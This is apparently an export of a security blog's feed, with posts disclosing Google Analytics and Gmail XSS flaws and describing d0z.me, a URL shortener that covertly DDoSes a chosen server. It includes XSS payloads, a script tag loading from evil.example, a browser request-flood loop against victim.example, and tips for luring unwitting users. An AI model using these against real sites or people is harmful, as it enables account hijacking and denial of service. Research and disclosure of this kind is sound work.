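// not Google's actual code): encode HTML metacharacters in header values
// before they are echoed into the page. "\u0026" and "\u003c" are the
// ampersand and less-than characters, written as escapes so this sample
// contains neither literally.
function escapeHtmlEntities(value) {
  return value
    .replace(/\u0026/g, "\u0026amp;")  // ampersand first, so the entities below aren't double-escaped
    .replace(/\u003c/g, "\u0026lt;")
    .replace(/>/g, "\u0026gt;")
    .replace(/"/g, "\u0026quot;")
    .replace(/'/g, "\u0026#39;");
}

// A From header carrying markup becomes inert text once encoded:
escapeHtmlEntities("\u003cscript src='http://evil.example/x.js'>\u003c/script>");
```

&lt;p&gt;Once encoded this way, an injected script tag in a header renders as harmless visible text instead of executing.&lt;/p&gt;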
&lt;p&gt;Overall, it was a pretty interesting vulnerability, and it was a good
opportunity for me to learn a little more about Android. I had a good
time familiarizing myself with the platform, and hopefully I will be
able to do some more interesting things with it in the future. It has
also definitely made me think twice before I open emails on my phone,
which is probably for the best. Hopefully once these platforms become
more mature, we won't see as many of these simple but serious
vulnerabilities. However, if the maturation process we've observed in
other security domains is any indication, don't hold your breath.
It's going to take time.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Google Analytics XSS Vulnerability</title><link href="https://spareclockcycles.org/2011/02/03/google-analytics-xss-vulnerability.html" rel="alternate"></link><updated>2011-02-03T19:21:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2011-02-03:2011/02/03/google-analytics-xss-vulnerability.html</id><summary type="html">&lt;p&gt;This post documents an XSS vulnerability I discovered in the event
tracking functionality provided by Google Analytics. Given a website's
Google account number (which can be found in the site source), one could
spoof specially crafted events that, when clicked in the administrative
interface, would run arbitrary Javascript in the victim's browser. This
would allow an attacker to, among other things, hijack the account.
Although it did not affect as many users as the &lt;a class="reference external" href="https://spareclockcycles.org/2010/12/14/gmail-google-chrome-xss-vulnerability/"&gt;Gmail XSS
vulnerability&lt;/a&gt; did, it posed a significant risk to many site
administrators, who are prime targets for attack.&lt;/p&gt;
&lt;div class="section" id="vulnerability-discovery"&gt;
&lt;h2&gt;Vulnerability Discovery&lt;/h2&gt;
&lt;p&gt;Back when I &lt;a class="reference external" href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/"&gt;released d0z.me&lt;/a&gt;, I realized that I had never set up
&lt;a class="reference external" href="http://code.google.com/apis/analytics/docs/tracking/eventTrackerGuide.html"&gt;event tracking&lt;/a&gt; for tarball downloads on my site. While getting this
configured, I got curious as to how well Google sanitized the incoming
data, given that a malicious user could arbitrarily define what events
would be sent and then presented to an administrator. I wrote up some
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/analytics_xss.js"&gt;incredibly simple Javascript&lt;/a&gt; that would send an XSS testing string in
the various fields provided by the event tracking API. After waiting a
few minutes for it to update in the Analytics interface, I inspected the
results.&lt;/p&gt;
&lt;p&gt;Sure enough, while double quotes and tag characters were escaped in the
corresponding link, single quotes were not. This would have been OK (the
rest of their js code uses double quotes religiously for strings), but
their use of Javascript link handlers and the need to pass an array of
strings made the problem exploitable:&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Good: &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;href=&amp;quot;event_object_detail?id=XXXXXXX&amp;amp;pdr=XXXXX-XXXX&amp;quot;&lt;/span&gt; &lt;span class="pre"&gt;onclick=&amp;quot;whatever_needs_doing()&amp;quot;&lt;/span&gt;&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Bad: &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;href=&amp;quot;javascript:analytics.PropertyManager._getInstance()._broadcastChange('events_bar_detail',&lt;/span&gt; ['type', &lt;span class="pre"&gt;'location'+alert('xss')+'',&lt;/span&gt; &lt;span class="pre"&gt;'event_action'])&amp;quot;&lt;/span&gt;&lt;/tt&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Interestingly, the Top Events section of the Event Handling page seems
to be the only place in the Analytics admin interface where Javascript
is called like this, which might have been part of the reason the
vulnerability existed. It also did not overtly break the page, which
might have kept testers from noticing. Getting a malicious event into
the Top Events section is trivial, as one only has to loop the
event-sending Javascript until the event's count climbs high enough.&lt;/p&gt;
&lt;p&gt;In Action:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2011/02/analytics_xss_clean.png"&gt;&lt;img alt="Analytics XSS Demo" src="https://spareclockcycles.org/wp-content/uploads/2011/02/analytics_xss_clean-300x148.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Note that the malicious nature of the link is only obvious for
demonstration reasons. Simply putting a legitimate URL in front of the
malicious payload would hide it from the user.&lt;/p&gt;
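&lt;p&gt;To make the mechanics concrete, here is a hypothetical reconstruction of the flawed templating (function and parameter names are mine, not Google's): double quotes and tag characters are encoded, but the value is then spliced into a single-quoted string inside a javascript: href, so an unescaped single quote terminates the string and the remainder runs as code.&lt;/p&gt;

```javascript
// Hypothetical reconstruction of the vulnerable templating, for
// illustration only. "\u003c" and "\u0026" stand in for the less-than
// and ampersand characters.
function buildEventLink(label) {
  var safe = label
    .replace(/\u003c/g, "\u0026lt;")
    .replace(/>/g, "\u0026gt;")
    .replace(/"/g, "\u0026quot;"); // note: single quotes pass through untouched
  return "javascript:showDetail(['type', '" + safe + "', 'event_action'])";
}

// A label that closes the string early smuggles live code into the handler:
buildEventLink("location'+alert('xss')+'");
// → javascript:showDetail(['type', 'location'+alert('xss')+'', 'event_action'])
```

&lt;p&gt;This mirrors the Good/Bad pair above: encoding that is sufficient inside a double-quoted HTML attribute fails inside a single-quoted Javascript string.&lt;/p&gt;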
&lt;/div&gt;
&lt;div class="section" id="disclosure"&gt;
&lt;h2&gt;Disclosure&lt;/h2&gt;
&lt;p&gt;I contacted Google regarding the vulnerability on January 5th, with
relevant PoC code. They replied on the 6th, confirming the
vulnerability, and confirmed that a patch had been written and was being
tested on the 12th. On February 3rd, they confirmed their testing was
complete, and that the patch was in place. I confirmed with my own
tests, and then publicly disclosed. In addition, I was awarded $1000 for
the report. Not bad for a little bit of Javascript and poking around. :P&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="unrelated-blather"&gt;
&lt;h2&gt;Unrelated Blather&lt;/h2&gt;
&lt;p&gt;To those wondering where I've been the past month or so, I have been
busy IRL getting set up at grad school, among other things. As this blog
is mainly to document the research and such that I am doing, the amount
I post is directly related to the time I have to mess with things. I
promise, updates to &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt; soon, as well as my first Android
vulnerability (yay!), and then whatever I feel like posting on after
that. It's good to be back!&lt;/p&gt;
&lt;/div&gt;
</summary><category term="google analytics"></category><category term="google reward program"></category><category term="vulnerability"></category><category term="xss"></category></entry><entry><title>Follow-up On d0z.me: Some Thoughts</title><link href="https://spareclockcycles.org/2010/12/22/follow-up-on-d0z-me-some-thoughts.html" rel="alternate"></link><updated>2010-12-22T16:17:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-22:2010/12/22/follow-up-on-d0z-me-some-thoughts.html</id><summary type="html">&lt;div class="section" id="security-bug-fixes"&gt;
&lt;h2&gt;Security/Bug Fixes&lt;/h2&gt;
&lt;p&gt;I'm a big believer in being up front and loud about security
vulnerabilities and software bugs that are found, so I wanted to first
and foremost tell anyone using the d0z.me source code to grab an
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/dosme.tar.gz"&gt;updated version&lt;/a&gt;. I have to apologize, as I really had not expected
this site to get anywhere near as popular as quickly as it did, and so I
had not spent a ton of time testing it before I put it in production. This
is a sadly common mistake that the worst of us tend to fall into :-/ .
As such, one of the regexes I was using in a sanitize routine did not
function correctly, allowing for XSS and SQL injection with a specially
crafted URL. The hole was patched quickly, and no significant user data
was taken (as I keep none), but I wanted to make sure everyone knew in
case they're putting up their own versions. Props to the person on
Reddit who pointed out the flaw to me. I'm not sure who it was, as it
has since been deleted, but props all the same.&lt;/p&gt;
&lt;p&gt;Secondly, a minor bug: a reader named Max pointed out that I had
mistyped a couple of characters in my charset. I should have just used Python's
string.letters+string.digits, but oh well. Thanks for the report!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mitigation-techniques"&gt;
&lt;h2&gt;Mitigation Techniques&lt;/h2&gt;
&lt;p&gt;Now, onto happier / more interesting topics!&lt;/p&gt;
&lt;div class="section" id="dns-blocking"&gt;
&lt;h3&gt;DNS Blocking&lt;/h3&gt;
&lt;p&gt;An oldie, but a goodie. Long used to fight malware, this approach would
mitigate malicious shorteners simply by changing the DNS entry to
redirect the user to a warning page. It was interesting to see that,
within a day of releasing d0z.me, it was already being blocked by
OpenDNS. An impressive response time, though given that the link was
posted all over Slashdot and Reddit before it got blocked, I suspect the
response was faster than it usually would be.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/opendns.png"&gt;&lt;img alt="OpenDNS blocking d0z.me" src="https://spareclockcycles.org/wp-content/uploads/2010/12/opendns-300x159.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I'm not going to spend much space discussing this one because, rather
obviously, this is not a feasible technique in the long run, as it
hasn't been particularly effective for malware either. Attackers can
easily register domains more quickly than they're being blocked, and not
all DNS providers provide such a defense for their users in the first
place. However, it is a decent first line of defense on the user's end,
and will at least block more popular and older malicious URL shorteners.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="http-referrer-mod-rewrite"&gt;
&lt;h3&gt;HTTP Referrer + mod_rewrite&lt;/h3&gt;
&lt;p&gt;Some smart people have been discussing the use of mod_rewrite (or
similar) to redirect based on HTTP referrers to block these attacks
(interested readers can find an excellent write-up at &lt;a class="reference external" href="http://jaymill.net/?p=46#more-46"&gt;jaymill.net&lt;/a&gt;).
Although it's an interesting approach that might deter the casual
attacker, I see a couple big problems with this.&lt;/p&gt;
&lt;p&gt;Firstly, it is absolutely trivial to make this attack function with a
whole host of different HTTP referrers, simply by hosting a couple
static files on more trusted domains. The HTTP referrer header and the
Origin header for HTML5 cross-origin requests are based on the
source domain of the script location. To circumvent HTTP referrer
protections, one needs only to upload a small html file and a Javascript
file to Google Pages, Google App Engine, Amazon, etc, etc to give the
requests a new domain. I don't believe most sites would be OK with
blocking referrers from a large number of these kinds of domains just to
avoid this attack, unless the attack was already underway and serious.
Also, the fact that such a large number of domains can be used means
that whoever is managing the site would have to keep track of and enter
rules for every single domain, which could become quite the
herculean task.&lt;/p&gt;
&lt;p&gt;I took the liberty of writing up a PoC demonstrating that, using a
hidden iframe, one can make attacks like d0z.me appear to have a
different referrer address (spareclockcycles.org). You can view it at
&lt;a class="reference external" href="http://d0z.me/poc_refer.html"&gt;http://d0z.me/poc_refer.html&lt;/a&gt; (note: this link attacks example.com, which
should be local). If you look at the requests in Wireshark, you can see
that the Origin and HTTP Referrer headers are set to
spareclockcycles.org and spareclockcycles.org/evil.html respectively.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-4.png"&gt;&lt;img alt="Wireshark capture" src="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-4-300x178.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This was tested with both Firefox and Chrome, and this behavior conforms
with what the &lt;a class="reference external" href="http://www.w3.org/TR/cors/"&gt;working draft&lt;/a&gt; has to say on the topic. Some browsers
might be non-compliant, but the big two apparently aren't.&lt;/p&gt;
&lt;p&gt;Secondly, while this mitigates the attack somewhat, it simply raises the
bar of how many users an attacker needs to recruit through clicks on
malicious links. Enough traffic will still overwhelm the server, as
valid connections are still being fully established, and some level of
processing still has to be done on their requests.&lt;/p&gt;
&lt;p&gt;I believe that Jeremy mentioned both of these issues, to some degree, in
his post, and seemed to believe that both were of small enough concern
that they didn't really matter. I have to respectfully disagree on that
point, however. Yes, it raises the bar slightly for an
attacker, but in the long run it proves very little hindrance to anyone with
any level of technical ability. It is certainly a good recommendation
for those currently under attack; however, I think a more solid
approach to dealing with this issue is needed in the long run, and that
we need to eventually address it with a complete solution rather than
with temporary band-aids.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="changing-cross-origin-requests-standards"&gt;
&lt;h3&gt;Changing Cross-Origin Requests Standards&lt;/h3&gt;
&lt;p&gt;It is clear to me that this problem is going to have to be fixed with
modifications on both ends, servers and browsers alike, if we want a
real fix.&lt;/p&gt;
&lt;p&gt;The main problem seems to be that browsers, when making HTML5
cross-origin requests, do not cache the fact that they have been denied
access on a certain server. Most servers have no reason to allow
cross-origin requests, and so rightly deny them across the board, but do
so (per official specifications) by replying without the domain name of
the requesting server in an Access-Control-Allow-Origin header. The
browsers, in turn, cache the denial for that particular piece of
content, but will willingly try to grab another piece of content
immediately. This is particularly obvious if you watch d0z.me work in
Chrome: the Javascript console fills up with one denial error after
another, but the browser continues to pound the server with requests.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-5.png"&gt;&lt;img alt="Chrome cross-origin error screenshot" src="https://spareclockcycles.org/wp-content/uploads/2010/12/Screenshot-5-300x167.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This seems silly at first glance, but is actually a side-effect of the
fact that different files/directories on the same site can have
different cross-origin policies (i.e., you can make specific files
cross-origin accessible by only adding the proper header when you
respond to those requests). The browser doesn't want to cache a denial
for the entire site when it's possible that some of the content could be
allowed. So here is our problem: how do we remember cross-origin denials
for sites that have no such content, while still allowing sites to have
differing policies for different sections?&lt;/p&gt;
&lt;p&gt;My first thought was to modify the standards to require any site that
services cross-origin requests in any capacity to put an
&amp;quot;Allows-Cross-Origin&amp;quot; header in all of its responses to cross-origin
requests. This way, if a browser tries to access the server once with a
cross-origin request and doesn't see this header, it can cache the
denied response for a certain period of time before allowing any other
requests to be sent, and be assured that there is no cross-origin
content available on the server. This would mitigate the attack for a
large portion of servers, as most have little reason to allow
cross-origin requests in the first place. For those that do need to
provide this service, it might be advisable for browsers to begin
rate-limiting cross-origin requests, so as to minimize the potential
effectiveness of this attack on those sites as well. There is no valid
reason that I can think of that a browser should need to make 10,000
cross-origin requests a minute, so why let it?&lt;/p&gt;
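&lt;p&gt;A sketch of the proposed browser-side logic (the Allows-Cross-Origin header and the cache policy are my suggestion, not part of any current specification): after one response from an origin that lacks the header, suppress further cross-origin requests to it for a cooldown period.&lt;/p&gt;

```javascript
// Sketch of the proposed denial cache; header name and timings are my
// suggestion, not part of any current specification.
var DENIAL_TTL_MS = 60000; // cooldown before retrying a denying origin
var denialCache = {};      // origin -> timestamp of the cached denial

function shouldSendCrossOriginRequest(origin, now) {
  var deniedAt = denialCache[origin];
  if (deniedAt === undefined) return true; // never denied: go ahead
  return now - deniedAt > DENIAL_TTL_MS;   // retry only after the cooldown
}

function recordResponse(origin, headers, now) {
  // No "Allows-Cross-Origin" header means the server opted out of
  // cross-origin service entirely: cache the denial for the whole origin.
  if (headers["Allows-Cross-Origin"] === undefined) {
    denialCache[origin] = now;
  }
}
```

&lt;p&gt;Under this scheme, a d0z.me-style page would get one request per origin per cooldown window instead of thousands per minute, while servers that do serve cross-origin content are unaffected because every one of their responses carries the header.&lt;/p&gt;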
&lt;p&gt;This is by no means the only solution to this problem, however, and I
would love to hear what other ideas people have on the matter. I very
well could have overlooked a much more simple and effective fix, or
missed problems with my own.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="d0z-me-improvements-updates"&gt;
&lt;h2&gt;d0z.me Improvements/Updates&lt;/h2&gt;
&lt;p&gt;As I mentioned earlier, d0z.me was simply something I hacked together in
a few hours for research purposes (and, of course, fun). This,
unfortunately, led to code that is really not up to anyone's standards,
including mine, as I had been more concerned with testing the attack
than writing good stuff. I also did not experiment too much with the
best ways to exploit the HTML5 cross-origin approach, as I was planning
on doing this more later after I released the tool. I have been in
discussion with the researcher who originally reported on this problem,
&lt;a class="reference external" href="http://andlabs.org/about.html"&gt;Lavakumar Kuppan&lt;/a&gt;, who very kindly helped identify a number of places
where my code could be improved upon.&lt;/p&gt;
&lt;p&gt;Because of these things, I am working on releasing a more secure,
reliable, and effective PoC, written for Django and the Google App
Engine. The strain of keeping both spareclockcycles.org and d0z.me
running has not been easy on my server, so it will be nice to get half
the load into the cloud. This release will also hopefully include some
significant refinements to the stealth and speed of the DoS. It will
probably be delayed until after the holidays though, as I want to give
concerned parties some time to come up with fixes for this issue before
releasing a more potent tool, as well as give myself some time to make
sure I get things right.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="statistics-analysis"&gt;
&lt;h2&gt;Statistics Analysis&lt;/h2&gt;
&lt;p&gt;I know I promised &lt;a class="reference external" href="http://twitter.com/#!/sanitybit"&gt;&amp;#64;sanitybit&lt;/a&gt; that I would have some stats on d0z.me
today, but sadly, this post has already gotten way too long, and I'd
like to spend some quality time poking around with the numbers. However,
quick stats: at the time of this writing, I've had ~30,000 page views
(14,000 unique visitors) on the d0z.me domain and ~19,000 page views
(16,000 unique visitors) on spareclockcycles.org since Sunday.
Definitely not bad, especially for someone who is used to having visitor
counts in the tens...&lt;/p&gt;
&lt;p&gt;But yeah, welcome to all my readers! More interesting statistics are
still coming, so come back soon.&lt;/p&gt;
&lt;/div&gt;
</summary><category term="d0z.me"></category><category term="ddos"></category><category term="html5"></category></entry><entry><title>d0z.me: The Evil URL Shortener</title><link href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener.html" rel="alternate"></link><updated>2010-12-19T18:08:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-19:2010/12/19/d0z-me-the-evil-url-shortener.html</id><summary type="html">&lt;div class="section" id="the-inspiration"&gt;
&lt;h2&gt;The Inspiration&lt;/h2&gt;
&lt;p&gt;I, like many people, have been closely following a lot of the chaos
happening around the recent Wikileaks dump, and was particularly
fascinated by &lt;a class="reference external" href="http://www.infosecurity-magazine.com/view/14448/wikileaks-let-the-ddos-battles-begin/"&gt;the DDoS attacks by activists on either side&lt;/a&gt;. One tool
specifically caught my eye in the midst of the attacks, however: the &lt;a class="reference external" href="http://encyclopediadramatica.com/LOIC#JS_LOIC"&gt;JS
LOIC&lt;/a&gt;. The tool works simply by constantly altering an image file's
source location, so that the browser is forced to continuously hammer
the targeted server with HTTP requests. Not a sophisticated or
technically interesting tool by any means, but conceptually interesting
in that it only requires a browser to execute one's portion of a DoS
attack. While the concept itself is not all that new, it got me thinking
about the implications of such browser based DoS attacks. Clearly, it
opens the door for the creation of a DDoS botnet without ever having to
actually exploit the hosts participating in the network; all that is
required is to get some Javascript to run in the participants' browsers.&lt;/p&gt;
&lt;p&gt;As if the JS LOIC concept didn't have serious enough implications on its
own, though, researchers from &lt;a class="reference external" href="http://blog.andlabs.org/"&gt;Attack &amp;amp; Defense Labs&lt;/a&gt; recently
presented a &lt;a class="reference external" href="http://blog.andlabs.org/2010/12/performing-ddos-attacks-with-html5.html"&gt;much more effective DoS attack vector&lt;/a&gt; at &lt;a class="reference external" href="https://www.blackhat.com/html/bh-ad-10/bh-ad-10-home.html"&gt;Blackhat Abu
Dhabi&lt;/a&gt;, which relies on &lt;a class="reference external" href="http://www.whatwg.org/specs/web-workers/current-work/"&gt;Web Workers&lt;/a&gt; and &lt;a class="reference external" href="http://www.w3.org/TR/cors/"&gt;Cross Origin Requests&lt;/a&gt; in
HTML5. This attack, though it only works in HTML5 browsers, is
supposedly capable of performing between 3,000 and 4,000 requests a
minute under real world conditions, which is a significant improvement
over the simple but functional img tag reload attack. In my tests, the
HTML5 attack clocked in at ~1500-2000 requests/minute, with the img
reload attack hovering around 600 requests/minute.&lt;/p&gt;
&lt;p&gt;In addition to these DoS worries, I have also been uncomfortable for
awhile now about the increasing use of and reliance upon URL shorteners
for sharing links. While we can somewhat trust larger names in the field
such as &lt;a class="reference external" href="http://bit.ly"&gt;bit.ly&lt;/a&gt;, it seems that the marketplace for these services is
becoming increasingly populated with more and more obscure shorteners.
This is quite worrying, as it encourages people to trust all the
shortened links they happen to come across, even ones they've never seen
before, and acquire a false sense of security in the knowledge that it
will take them to the destination advertised by the text. However, as
most relatively savvy people should know, this is certainly not always
the case. A malicious shortener could essentially take you anywhere it
pleased, and the user would be none the wiser.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="d0z-me-please"&gt;
&lt;h2&gt;D0z Me Please&lt;/h2&gt;
&lt;p&gt;With these issues in mind, I began wondering: what would happen if I
mashed them all together? Enter &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt;: a proof-of-concept URL
shortener that, while getting users to their destinations, also covertly
attacks an arbitrary server.&lt;/p&gt;
&lt;p&gt;The concept is quite simple, really. Attackers go to &lt;a class="reference external" href="http://d0z.me"&gt;d0z.me&lt;/a&gt; and enter
a link they think could be popular/want to share, but also enter the
address of a server that they would like to attack as well. Then, they
share the shortened link with as many people as possible, in as many places as
possible. Extensive use of social media sites is probably a must to achieve
the best results.&lt;/p&gt;
&lt;p&gt;When users click on the link, they appear to be redirected to the
requested content, but they are in fact looking at the page in an
embedded iframe. This is identical to how those rather annoying Digg and
Stumbleupon toolbars work, except the embedding is invisible to the user
(minus the location URL in the toolbar). While the users are busy
viewing the page, a malicious Javascript DoS runs in the background,
hammering the targeted server with a deluge of requests from these
unsuspecting clients. If these clients continue browsing from that page,
we can maintain our DoS in the background the entire time.&lt;/p&gt;
&lt;p&gt;Clearly, this attack is dependent on getting a significant number of
users to view a given link in a short amount of time, and, hopefully,
keeping them on the page as long as possible. There are two main
scenarios for garnering such traffic: one, tricking users into viewing
the link and staying on it through whatever means necessary, and two, a
concerted effort by a large number of users who willingly join the DDoS
by following the link.&lt;/p&gt;
&lt;p&gt;Scenario number one requires that the malicious attacker first come up
with some content that he/she thinks will/could become popular; finding
said content, of course, is not always an easy task. One possible vector
is through the use of online games. Such games tend to keep users on the
site for extended periods of time, lengthening the time of DoS. If one
could find/make a game popular enough, and spread it through this link,
then a significant amount of traffic could be achieved. Another
possibility is a variation on what we have come to know as the free iPad
scam. Tell users that if they open a link and stay on the page long
enough, they will win a free iPad. This could be surprisingly effective,
given how successful such offers have been in the past. A third possible
way to exploit this technique could be a malicious rick roll of sorts:
promise one thing, deliver some other ridiculous/hilarious thing, and
hope that people find it funny and spread it quickly to as many people
as possible.&lt;/p&gt;
&lt;p&gt;Scenario two seems more similar to what we are currently seeing behind
the Wikileaks-related attacks. If leaders convince enough of their
followers simply to &amp;quot;open this link to win&amp;quot;, it is conceivable that a
very large number of people would choose to do so. However, this
particular method (URL shortened link) is much more troublesome than
current methods as, in such a scenario, there would be little way for
authorities to determine whether or not a participant was intentionally
or inadvertently involved in the attack. It is possible that some
participants may have simply been curious or tricked into clicking the
link, providing plausible deniability for any would-be attacker.&lt;/p&gt;
&lt;p&gt;Both of these attacks, of course, can be mixed together in a hybrid
style attack, which is the most likely form that it would take in a real
DDoS. It is not completely clear to me what results a possible attack
could achieve, but it seems likely that, given a dedicated userbase, one
could use this method with a decent level of effectiveness. In addition,
it would give intentional attackers a shield of plausible deniability to
hide behind in case their IP address was singled out as an attacker in
the DoS.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="implementation-details"&gt;
&lt;h2&gt;Implementation Details&lt;/h2&gt;
&lt;p&gt;My implementation of this attack is, at best, a hack job, but was merely
meant to illustrate how easy it is to actually implement, how simple it
is to launch a DDoS simply by getting people to follow a link, and how
seriously our reliance on URL shorteners can affect security. This
implementation utilizes two DoS methods: first, of course, is the same
method as the JS LOIC (refreshing images repeatedly), and second is the
HTML5 vector that was previously discussed. The linked page is embedded
via a simple iframe.&lt;/p&gt;
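&lt;p&gt;For reference, the img-reload half of the implementation boils down to a few lines (the names and interval below are mine; the cache-busting query string is what forces a fresh request on every reassignment of img.src):&lt;/p&gt;

```javascript
// Minimal sketch of the img-reload vector; names and timing are mine.
// Each URL is unique, so the browser cache never absorbs a request.
var requestCounter = 0;
function nextAttackUrl(target) {
  requestCounter = requestCounter + 1;
  return target + "?x=" + requestCounter + "." + Date.now();
}

// In a browser, this drives the loop; guarded so it only runs there.
if (typeof document !== "undefined") {
  var img = new Image();
  setInterval(function () {
    img.src = nextAttackUrl("http://victim.example/");
  }, 100);
}
```

&lt;p&gt;The HTML5 vector is structured the same way, but moves the request loop into Web Workers issuing cross-origin requests, which is why it achieves the higher request rates quoted earlier.&lt;/p&gt;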
&lt;p&gt;As it is, the HTML5 attack and the img reload attack are both basically
invisible in Chrome unless you're looking for them. I had to open
Wireshark, the Javascript console, or my server logs to verify that the
DoS was actually functioning correctly. Firefox is pretty noisy about
the tests, though, as the img reload attack causes the page to appear to
be loading indefinitely, and the HTML5 web worker threads chew up
processor time.&lt;/p&gt;
&lt;p&gt;I haven't spent much time trying to solve these, but if someone knows a
fix, I'd appreciate your help. I have also done a little messing around
with different ways of keeping the user on the page, but atm have not
had much success without resorting to extremely annoying and only
minimally effective techniques. I am &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/dosme.tar.gz"&gt;releasing the code&lt;/a&gt; under the
GPLv3, and, as always, welcome any advice that people have. As it's been
a couple years since I've done much web application work, please be
gentle.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mitigation"&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;Mitigating these types of attacks is not exactly straightforward. As
with all DoS attacks, there's only so much one can do to prevent them.
If an attacker simply has more bandwidth than you have, as they would if
they got enough people to click these links, then it's pretty much game
over regardless until you can get the attacks blocked at the ISP level.
As these attacks do not rely on spoofed packets, and appear, at least at
a passing glance, to be legitimate traffic, filtering it is also
somewhat difficult.&lt;/p&gt;
&lt;p&gt;The HTML5 CORS attack, according to Attack &amp;amp; Defense Labs' research, can be blocked,
if your server doesn't allow cross-origin requests, by making a rule in your
WAF that blocks all requests with an Origin header. However, given
enough people performing the attack, the server could be overwhelmed regardless.&lt;/p&gt;
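&lt;p&gt;Expressed as a request filter, the rule is a one-line check. This is a sketch under the assumption that the protected site never legitimately serves cross-origin content; the function name is mine:&lt;/p&gt;

```javascript
// Sketch of the WAF rule described above: a site that serves no
// cross-origin content can drop any request carrying an Origin header.
// Assumes header names have been normalized to lowercase.
function filterRequest(headers) {
  if (headers["origin"] !== undefined) {
    return { allowed: false, status: 403 }; // cross-origin probe: reject
  }
  return { allowed: true };                 // ordinary browsing traffic
}
```

&lt;p&gt;The caveat above still applies, of course: accepting the connection and running the check are themselves work, so a large enough flood wins anyway.&lt;/p&gt;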
&lt;p&gt;You can find &lt;a class="reference external" href="http://www.google.com/search?q=mitigating+dos+attacks"&gt;more about mitigating DoS attacks on Google&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;From an end-user's perspective, all you need to do to avoid joining a
DDoS is to be careful about following suspicious URL redirector links,
and use something like &lt;a class="reference external" href="http://noscript.net/"&gt;NoScript&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="final-notes"&gt;
&lt;h2&gt;Final Notes&lt;/h2&gt;
&lt;p&gt;A few final notes:&lt;/p&gt;
&lt;p&gt;Firstly, this site is NOT meant to be an attack site, or to help support
either side in the whole Wikileaks debacle. I don't want any part in the
current cyber skirmishes. It is merely a demonstration of some things
that I found interesting and wanted to work on.&lt;/p&gt;
&lt;p&gt;Secondly, I am not responsible for how this site or this code is used.
You should only be testing this on sites you own and control, and if you
aren't, chances are that you are breaking the law. You, the user, are
responsible for knowing the relevant laws in your area, and acting
accordingly.&lt;/p&gt;
&lt;p&gt;Thirdly, to the researchers who first reported on the HTML5 DDoS vector,
thanks. Quite interesting research. I owe you a beverage of your
choosing sometime :P .&lt;/p&gt;
&lt;p&gt;Finally, yes, to all you a-holes out there, I know, it would be
ironic/funny to DoS a site that is demonstrating a DoS attack. Please
don't. I know you can, and that it would be trivial to do, as this
server isn't exactly hardened. Let's just save each other the time and
hassle and say that you win, theoretical attacker. Congratulations.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>Gmail+Google Chrome XSS Vulnerability</title><link href="https://spareclockcycles.org/2010/12/14/gmail-google-chrome-xss-vulnerability.html" rel="alternate"></link><updated>2010-12-14T20:24:00-05:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-12-14:2010/12/14/gmail-google-chrome-xss-vulnerability.html</id><summary type="html">&lt;p&gt;The weekend before last, I found a flaw in Gmail that on the one hand
was rather exciting for me (as I hadn't expected to find anything at
all, and it was pretty clearly &lt;a class="reference external" href="http://googleonlinesecurity.blogspot.com/2010/11/rewarding-web-application-security.html"&gt;reward-worthy&lt;/a&gt;), but on the other was a
little unnerving, given how quickly and easily I was able to find it and
how serious the vulnerability was.&lt;/p&gt;
&lt;div class="section" id="vulnerability-discovery"&gt;
&lt;h2&gt;Vulnerability Discovery&lt;/h2&gt;
&lt;p&gt;While doing some work on an exploit for an XSS flaw that I had already
found on another platform (details will be released in the semi-near
future), I decided to see if there were any XSS vulnerabilities that I
had missed. The first thing I wanted to try was to see if the
application was properly sanitizing filenames in attachments, so I
modified a Python email testing application I hacked together and shot
off an email with an attachment named '';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}.txt (a la
&lt;a class="reference external" href="http://ha.ckers.org/xss.html"&gt;RSnake&lt;/a&gt;) .&lt;/p&gt;
&lt;p&gt;Everything looked good on the platform I was testing, so I began
considering other possible attack vectors. However, on a whim, I decided
to open up the email in Gmail as well, so I fired up Chrome and logged
into my test account. I could not believe my eyes, but the filename was
being used un-sanitized! A couple test emails later, I had a working XSS
